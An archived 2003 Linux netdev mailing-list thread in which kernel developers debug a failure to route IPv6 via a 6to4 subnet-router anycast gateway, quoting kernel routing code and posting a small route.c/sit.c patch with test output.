[iso-2022-jp] $B5HF#1QL@(B wrote: > > > In article (at Fri, 11 Jul 2003 13:03:54 +0300 (EEST)), Pekka Savola says: > > > > > > > > We have but we cannot; it is refcnt'ed. > > > > > > > > I don't understand what you mean. Refcnt'ed by a userland process, so > > > > that if you'd want the subnet-router anycast address, the whole time a > > > > process (like radvd) should be running.. or what? > > > > > > Kernel has refcnt for subnet router anycast address. > > > Ref/dereference from userspace is done via socket. > > > You cannot derefer subnet router anycast address > > > from userspace if the socket hasn't refered it. > > > > So? The point is that subnet router anycast address *could* be referenced > > explicitly by a user-land socket (e.g. by radvd), not kernel at all. > > So, you cannot remove subnet router anycast address from > kernel via this interface; kernel keeps one reference. .. which is why kernel shouldn't keep *any* reference *at all*! > (Hmm, I may misunderstand your mail...) .. seems like it.. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 11 04:02:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 04:02:32 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BB2R2x013326 for ; Fri, 11 Jul 2003 04:02:28 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6BB3wBo021516; Fri, 11 Jul 2003 20:03:58 +0900 Date: Fri, 11 Jul 2003 20:03:57 +0900 (JST) Message-Id: <20030711.200357.33143193.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.195917.89662318.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3951 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 13:59:14 +0300 (EEST)), Pekka Savola says: > > So, you cannot remove subnet router anycast address from > > kernel via this interface; kernel keeps one reference. > > .. which is why kernel shouldn't keep *any* reference *at all*! No, it is because REQUIRED and UNREMOVABLE anycast address. 
I don't think it is good to change this. --yoshfuji From pekkas@netcore.fi Fri Jul 11 04:04:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 04:04:54 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BB4g2x013789 for ; Fri, 11 Jul 2003 04:04:43 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BB4TA27579; Fri, 11 Jul 2003 14:04:29 +0300 Date: Fri, 11 Jul 2003 14:04:28 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.200357.33143193.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3952 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 13:59:14 +0300 (EEST)), Pekka Savola says: > > > > So, you cannot remove subnet router anycast address from > > > kernel via this interface; kernel keeps one reference. > > > > .. which is why kernel shouldn't keep *any* reference *at all*! > > No, it is because REQUIRED and UNREMOVABLE anycast address. Smells like a circular requirement :-) > I don't think it is good to change this. That's another issue entirely. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings

From mika.liljeberg@welho.com Fri Jul 11 04:36:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 04:36:54 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BBah2x014426 for ; Fri, 11 Jul 2003 04:36:45 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6BBab5n001216; Fri, 11 Jul 2003 14:36:37 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6BBaaSN001215; Fri, 11 Jul 2003 14:36:36 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Pekka Savola Cc: Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057923396.893.16.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 14:36:36 +0300 X-archive-position: 3953 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev

Ok,

Here's a valid use for subnet router anycast that isn't working.
Somebody asked me how to set up 6to4, so I did a little testing.

Doesn't work:

hades:~# ip route add ::/0 via 2002:c058:6301::
RTNETLINK answers: Invalid argument

Works:

hades:~# ip route add ::/0 via 2002:c058:6301::1

Unfortunately the first form is what I need:

hades:~# host -t AAAA 6to4.ipv6.funet.fi
6to4.ipv6.funet.fi has AAAA address 2001:708:0:1::624
6to4.ipv6.funet.fi has AAAA address 2002:c058:6301::

So apparently there really is an inappropriate subnet router anycast
sanity check. Please fix this!
MikaL On Fri, 2003-07-11 at 08:22, Pekka Savola wrote: > On 11 Jul 2003, Mika Liljeberg wrote: > > On Fri, 2003-07-11 at 07:51, Pekka Savola wrote: > > > Well, the system may make some sense, but IMHO, there is still zero sense > > > in policing this thing when you add a route. That's just plain bogus. > > > This is a bug which must be fixed ASAP. > > > > Correct me if I'm wrong but I think in this case the interface had > > forwarding enabled and the sanity check in fact prevented a default > > route pointing to the node itself from being configured. > > > > Otherwise I fully agree. The subnet router anycast address doesn't > > warrant any special handling. > > If that's the case, it's OK -- it's OK, I don't remember the details. > > (It might be nice to have configurable /proc option on whether to enable > the subnet router anycast address at all, but that's also a different > story..) From pekkas@netcore.fi Fri Jul 11 04:49:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 04:49:15 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BBn32x015072 for ; Fri, 11 Jul 2003 04:49:05 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BBms527932; Fri, 11 Jul 2003 14:48:54 +0300 Date: Fri, 11 Jul 2003 14:48:54 +0300 (EEST) From: Pekka Savola To: Mika Liljeberg cc: Andre Tomt , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <1057923396.893.16.camel@hades> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3954 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On 11 Jul 2003, Mika Liljeberg wrote: > Here's a valid use for subnet router anycase that isn't working. > Somebody asked me how to set up 6to4, so I did a little testing. 
> > Doesn't work: > > hades:~# ip route add ::/0 via 2002:c058:6301:: > RTNETLINK answers: Invalid argument > > Works: > > hades:~# ip route add ::/0 via 2002:c058:6301::1 > > Unfortunately the first form is what I need: > > hades:~# host -t AAAA 6to4.ipv6.funet.fi > 6to4.ipv6.funet.fi has AAAA address 2001:708:0:1::624 > 6to4.ipv6.funet.fi has AAAA address 2002:c058:6301:: I think that in this particular case, if should have configured your interface address with 2002:v4:addr::/16, of which subnet anycast router address would be 2002::. > So apparently there really is an inappropriate subnet router anycast > sanity check. Please fix this! This *may* be caused by another issue too: nexthop's must be given in the compatible "::192.88.99.1" format, not 2002:xxxx :-( I sent a patch on over a year or so ago, but it didn't gain that much enthusiasm.. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Fri Jul 11 05:09:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 05:09:44 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BC9V2x015580 for ; Fri, 11 Jul 2003 05:09:33 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6BC9S5n001368; Fri, 11 Jul 2003 15:09:28 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6BC9QBr001367; Fri, 11 Jul 2003 15:09:26 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Pekka Savola Cc: Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: 
<1057925366.896.24.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 15:09:26 +0300 X-archive-position: 3955 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 14:48, Pekka Savola wrote: > On 11 Jul 2003, Mika Liljeberg wrote: > > Here's a valid use for subnet router anycase that isn't working. > > Somebody asked me how to set up 6to4, so I did a little testing. > > > > Doesn't work: > > > > hades:~# ip route add ::/0 via 2002:c058:6301:: > > RTNETLINK answers: Invalid argument > > > > Works: > > > > hades:~# ip route add ::/0 via 2002:c058:6301::1 > > > > Unfortunately the first form is what I need: > > > > hades:~# host -t AAAA 6to4.ipv6.funet.fi > > 6to4.ipv6.funet.fi has AAAA address 2001:708:0:1::624 > > 6to4.ipv6.funet.fi has AAAA address 2002:c058:6301:: > > I think that in this particular case, if should have configured your > interface address with 2002:v4:addr::/16, of which subnet anycast router > address would be 2002::. Ah ok. It *is* configured with a /16. As far as my host is concerned, 2002:c058:6301:: should be just a unicast address like any other, so maybe there is a IID==0 check somewhere? > > So apparently there really is an inappropriate subnet router anycast > > sanity check. Please fix this! > > This *may* be caused by another issue too: nexthop's must be given in the > compatible "::192.88.99.1" format, not 2002:xxxx :-( > > I sent a patch on over a year or so ago, but it didn't gain that much > enthusiasm.. I vote for fixing this too. 
:-) MikaL From mika.penttila@kolumbus.fi Fri Jul 11 05:42:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 05:42:45 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BCgW2x016093 for ; Fri, 11 Jul 2003 05:42:34 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071115434861:20294 ; Fri, 11 Jul 2003 15:43:48 +0300 Message-ID: <3F0EB227.50403@kolumbus.fi> Date: Fri, 11 Jul 2003 15:48:39 +0300 From: =?ISO-8859-15?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Mika Liljeberg CC: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <1057925366.896.24.camel@hades> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 11.07.2003 15:43:48, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 11.07.2003 15:43:20, Serialize complete at 11.07.2003 15:43:20 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=ISO-8859-15; format=flowed X-archive-position: 3956 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev It turns out to be the (otherwise valid) check for IFF_LOOPBACK for gateway's address in ip6_route_add() that gives EINVAL for prefix::, and has nothing to do with iid being 0, just a coinsidence.... --Mika Mika Liljeberg wrote: >On Fri, 2003-07-11 at 14:48, Pekka Savola wrote: > > >>On 11 Jul 2003, Mika Liljeberg wrote: >> >> >>>Here's a valid use for subnet router anycase that isn't working. 
>>>Somebody asked me how to set up 6to4, so I did a little testing. >>> >>>Doesn't work: >>> >>>hades:~# ip route add ::/0 via 2002:c058:6301:: >>>RTNETLINK answers: Invalid argument >>> >>>Works: >>> >>>hades:~# ip route add ::/0 via 2002:c058:6301::1 >>> >>>Unfortunately the first form is what I need: >>> >>>hades:~# host -t AAAA 6to4.ipv6.funet.fi >>>6to4.ipv6.funet.fi has AAAA address 2001:708:0:1::624 >>>6to4.ipv6.funet.fi has AAAA address 2002:c058:6301:: >>> >>> >>I think that in this particular case, if should have configured your >>interface address with 2002:v4:addr::/16, of which subnet anycast router >>address would be 2002::. >> >> > >Ah ok. It *is* configured with a /16. As far as my host is concerned, >2002:c058:6301:: should be just a unicast address like any other, so >maybe there is a IID==0 check somewhere? > > > >>>So apparently there really is an inappropriate subnet router anycast >>>sanity check. Please fix this! >>> >>> >>This *may* be caused by another issue too: nexthop's must be given in the >>compatible "::192.88.99.1" format, not 2002:xxxx :-( >> >>I sent a patch on over a year or so ago, but it didn't gain that much >>enthusiasm.. >> >> > >I vote for fixing this too. 
:-) > > MikaL > >- >To unsubscribe from this list: send the line "unsubscribe linux-kernel" in >the body of a message to majordomo@vger.kernel.org >More majordomo info at http://vger.kernel.org/majordomo-info.html >Please read the FAQ at http://www.tux.org/lkml/ > > > From mika.liljeberg@welho.com Fri Jul 11 06:38:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 06:38:47 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BDca2x017690 for ; Fri, 11 Jul 2003 06:38:37 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6BDcX5n001674; Fri, 11 Jul 2003 16:38:33 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6BDcWwc001673; Fri, 11 Jul 2003 16:38:32 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Mika =?ISO-8859-1?Q?Penttil=E4?= Cc: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <3F0EB227.50403@kolumbus.fi> References: <1057925366.896.24.camel@hades> <3F0EB227.50403@kolumbus.fi> Content-Type: text/plain; charset=iso-8859-15 Message-Id: <1057930712.895.32.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 16:38:32 +0300 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6BDca2x017690 X-archive-position: 3957 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 15:48, Mika Penttilä wrote: > It turns out to be the (otherwise valid) check for IFF_LOOPBACK for > gateway's address in ip6_route_add() that gives EINVAL for prefix::, and > has nothing to do 
with iid being 0, just a coincidence....

Not sure. Seems to me that ipv6_addr_type() flags the gateway address as
anycast. In ip6_route_add() [2.5.74] we have:

	if (rtmsg->rtmsg_flags & RTF_GATEWAY) {
		struct in6_addr *gw_addr;
		int gwa_type;

		gw_addr = &rtmsg->rtmsg_gateway;
		ipv6_addr_copy(&rt->rt6i_gateway, &rtmsg->rtmsg_gateway);
		gwa_type = ipv6_addr_type(gw_addr);

		if (gwa_type != (IPV6_ADDR_LINKLOCAL|IPV6_ADDR_UNICAST)) {
			struct rt6_info *grt;

			/* IPv6 strictly inhibits using not link-local
			   addresses as nexthop address.
			   Otherwise, router will not able to send redirects.
			   It is very good, but in some (rare!) curcumstances
			   (SIT, PtP, NBMA NOARP links) it is handy to allow
			   some exceptions. --ANK
			 */
			err = -EINVAL;
			if (!(gwa_type&IPV6_ADDR_UNICAST))
				goto out;

Looks like it would bail out here, unless I read the code wrong. How about:

			if (!(gwa_type&(IPV6_ADDR_UNICAST|IPV6_ADDR_ANYCAST)))
				goto out;

	MikaL

From mika.penttila@kolumbus.fi Fri Jul 11 07:21:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 07:22:04 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BELn2x019538 for ; Fri, 11 Jul 2003 07:21:50 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071117230610:20344 ; Fri, 11 Jul 2003 17:23:06 +0300 Message-ID: <3F0EC96D.6080102@kolumbus.fi> Date: Fri, 11 Jul 2003 17:27:57 +0300 From: =?ISO-8859-15?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Mika Liljeberg CC: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <1057925366.896.24.camel@hades> <3F0EB227.50403@kolumbus.fi> <1057930712.895.32.camel@hades> X-MIMETrack: Itemize by SMTP Server on
marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 11.07.2003 17:23:06, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 11.07.2003 17:22:37, Serialize complete at 11.07.2003 17:22:37 Content-Type: text/plain; charset=iso-8859-15; format=flowed Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6BELn2x019538 X-archive-position: 3958 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev afaics, ipv6_addr_type() checks just for some rfc-specified reserved anycast addresses, not the ones in device list. Anyway, it will surely also bail out from the loopback test (anycast subnet router address is ours). --Mika Mika Liljeberg wrote: >On Fri, 2003-07-11 at 15:48, Mika Penttilä wrote: > > >>It turns out to be the (otherwise valid) check for IFF_LOOPBACK for >>gateway's address in ip6_route_add() that gives EINVAL for prefix::, and >>has nothing to do with iid being 0, just a coinsidence.... >> >> > >Not sure. Seems to me that ipv6_addr_type() flags the gateway address as >anycast. In ip6_route_addr() [2.5.74] we have: > > if (rtmsg->rtmsg_flags & RTF_GATEWAY) { > struct in6_addr *gw_addr; > int gwa_type; > > gw_addr = &rtmsg->rtmsg_gateway; > ipv6_addr_copy(&rt->rt6i_gateway, &rtmsg->rtmsg_gateway); > gwa_type = ipv6_addr_type(gw_addr); > > if (gwa_type != (IPV6_ADDR_LINKLOCAL|IPV6_ADDR_UNICAST)) { > struct rt6_info *grt; > > /* IPv6 strictly inhibits using not link-local > addresses as nexthop address. > Otherwise, router will not able to send redirects. > It is very good, but in some (rare!) curcumstances > (SIT, PtP, NBMA NOARP links) it is handy to allow > some exceptions. --ANK > */ > err = -EINVAL; > if (!(gwa_type&IPV6_ADDR_UNICAST)) > goto out; > >Looks like it would bail out here, unless I read the code wrong. 
>How about:
>
>			if (!(gwa_type&(IPV6_ADDR_UNICAST|IPV6_ADDR_ANYCAST)))
>				goto out;
>
>	MikaL
>
>-
>To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
>the body of a message to majordomo@vger.kernel.org
>More majordomo info at http://vger.kernel.org/majordomo-info.html
>Please read the FAQ at http://www.tux.org/lkml/
>
>
>

From mika.liljeberg@welho.com Fri Jul 11 07:32:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 07:32:52 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BEWd2x019938 for ; Fri, 11 Jul 2003 07:32:40 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6BEWZrD000739; Fri, 11 Jul 2003 17:32:35 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6BEWYmL000738; Fri, 11 Jul 2003 17:32:34 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Mika =?ISO-8859-1?Q?Penttil=E4?= Cc: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <3F0EC96D.6080102@kolumbus.fi> References: <1057925366.896.24.camel@hades> <3F0EB227.50403@kolumbus.fi> <1057930712.895.32.camel@hades> <3F0EC96D.6080102@kolumbus.fi> Content-Type: multipart/mixed; boundary="=-DKIDlaIdFwiWn2TE4NdP" Message-Id: <1057933954.695.6.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 17:32:34 +0300 X-archive-position: 3959 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev

--=-DKIDlaIdFwiWn2TE4NdP
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: quoted-printable

On Fri, 2003-07-11 at 17:27, Mika Penttilä wrote:
> afaics, ipv6_addr_type() checks just for some rfc-specified reserved
> anycast addresses, not the ones in device list. Anyway, it will surely
> also bail out from the loopback test (anycast subnet router address is
> ours).

Nope, since the tunnel interface will have 2002::/16. It seems to work
with the attached patch (against 2.4.21-ac4). A small fix to sit was
required as well. Look:

hades:~# ifconfig 6to4
6to4      Link encap:IPv6-in-IPv4
          inet6 addr: ::213.243.180.94/128 Scope:Compat
          inet6 addr: 2002:d5f3:b45e::1/16 Scope:Global
          UP RUNNING NOARP  MTU:1480  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:416 (416.0 b)  TX bytes:496 (496.0 b)

hades:~# ip -6 route list
::/96 via :: dev 6to4 metric 256 mtu 1480 advmss 1420
2002::/16 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420
fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440
fe80::/64 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420
ff00::/8 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440
ff00::/8 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420
default via 2002:c058:6301:: dev 6to4 metric 1024 mtu 1480 advmss 1420

hades:~# ping6 -c4 -n www.ipv6.org
PING www.ipv6.org(2001:6b0:1:ea:a00:20ff:fe8f:708f) 56 data bytes
64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=1 ttl=250 time=207 ms
64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=2 ttl=250 time=206 ms
64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=3 ttl=250 time=177 ms
64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=4 ttl=250 time=78.5 ms

--- www.ipv6.org ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3030ms
rtt min/avg/max/mdev = 78.547/167.637/207.698/52.821 ms

Anyone see any problems with this?
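
A note on the addresses in the listing above: in 6to4, the 32 bits that follow the 2002::/16 prefix carry an IPv4 address, and that is presumably what the try_6to4() call in the attached patch pulls out so that sit has an IPv4 tunnel endpoint to send to. What follows is only a minimal user-space sketch of that mapping, not the kernel code; sketch_6to4_v4addr() and sketch_6to4_text() are hypothetical names made up for this illustration.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>

/*
 * Hypothetical helper (not the kernel's try_6to4()): return the IPv4
 * address embedded in a 6to4 address, in network byte order, or 0 if
 * the address is not inside 2002::/16.
 */
static uint32_t sketch_6to4_v4addr(const struct in6_addr *a)
{
	uint32_t v4 = 0;

	/* 2002::/16 means the first two bytes are 0x20 0x02. */
	if (a->s6_addr[0] == 0x20 && a->s6_addr[1] == 0x02)
		memcpy(&v4, &a->s6_addr[2], sizeof(v4)); /* bytes 2..5 */
	return v4;
}

/*
 * Hypothetical convenience wrapper: parse a textual IPv6 address and
 * write the embedded IPv4 address as dotted quad into buf. Returns buf
 * on success, NULL if the input is not a usable 6to4 address.
 */
static const char *sketch_6to4_text(const char *v6text, char *buf, size_t len)
{
	struct in6_addr a6;
	struct in_addr a4;

	if (inet_pton(AF_INET6, v6text, &a6) != 1)
		return NULL;
	a4.s_addr = sketch_6to4_v4addr(&a6);
	if (a4.s_addr == 0)	/* treated as "no endpoint", like the !dst test */
		return NULL;
	return inet_ntop(AF_INET, &a4, buf, (socklen_t)len);
}
```

Fed the addresses from the listing, 2002:d5f3:b45e::1 maps to 213.243.180.94 (the same IPv4 address as in the tunnel's compat address) and the default gateway 2002:c058:6301:: maps to 192.88.99.1, while a non-6to4 address such as 2001:6b0:1:ea:a00:20ff:fe8f:708f yields NULL.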
	MikaL

--=-DKIDlaIdFwiWn2TE4NdP
Content-Disposition: attachment; filename=6to4.udiff
Content-Type: text/plain; name=6to4.udiff; charset=iso-8859-15
Content-Transfer-Encoding: quoted-printable

--- route.c.org	2003-07-11 16:41:55.000000000 +0300
+++ route.c	2003-07-11 16:42:16.000000000 +0300
@@ -743,7 +743,7 @@
 			   some exceptions. --ANK
 			 */
 			err = -EINVAL;
-			if (!(gwa_type&IPV6_ADDR_UNICAST))
+			if (!(gwa_type&(IPV6_ADDR_UNICAST|IPV6_ADDR_ANYCAST)))
 				goto out;
 
 			grt = rt6_lookup(gw_addr, NULL, rtmsg->rtmsg_ifindex, 1);
--- sit.c.org	2003-07-11 16:57:53.000000000 +0300
+++ sit.c	2003-07-11 17:17:42.000000000 +0300
@@ -495,10 +495,13 @@
 			addr_type = ipv6_addr_type(addr6);
 		}
 
-		if ((addr_type & IPV6_ADDR_COMPATv4) == 0)
-			goto tx_error_icmp;
+		if ((addr_type & IPV6_ADDR_COMPATv4))
+			dst = addr6->s6_addr32[3];
+		else
+			dst = try_6to4(addr6);
 
-		dst = addr6->s6_addr32[3];
+		if (!dst)
+			goto tx_error_icmp;
 	}
 
 	if (ip_route_output(&rt, dst, tiph->saddr, RT_TOS(tos), tunnel->parms.link)) {

--=-DKIDlaIdFwiWn2TE4NdP--

